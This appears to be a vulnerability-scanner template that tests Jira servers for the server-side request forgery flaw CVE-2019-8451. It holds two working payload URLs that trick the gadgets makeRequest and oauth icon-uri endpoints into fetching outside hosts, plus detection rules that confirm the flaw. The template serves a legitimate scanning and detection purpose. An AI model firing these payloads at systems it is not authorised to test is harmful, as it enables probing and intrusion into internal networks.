id: jira-ssrf
info:
  name: Jira SSRF CVE-2019-8451
  risk: Medium

params:
  - dest: 'bing.com'

replicate:
  ports: '8080'
  prefixes: 'jira, wiki, confluence'

requests:
  - method: GET
    redirect: false
    url: >-
     {{.BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@{{.dest}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
      - X-Atlassian-Token: no-check
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", '{"rc":200')

  - method: GET
    redirect: false
    url: >-
     {{.BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://127.0.0.1:443@https://ipinfo.io/json
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
    detections:
      - >-
        StringSearch("response", 'ipinfo.io/missingauth')

reference:
  - link: https://jira.atlassian.com/browse/JRASERVER-70018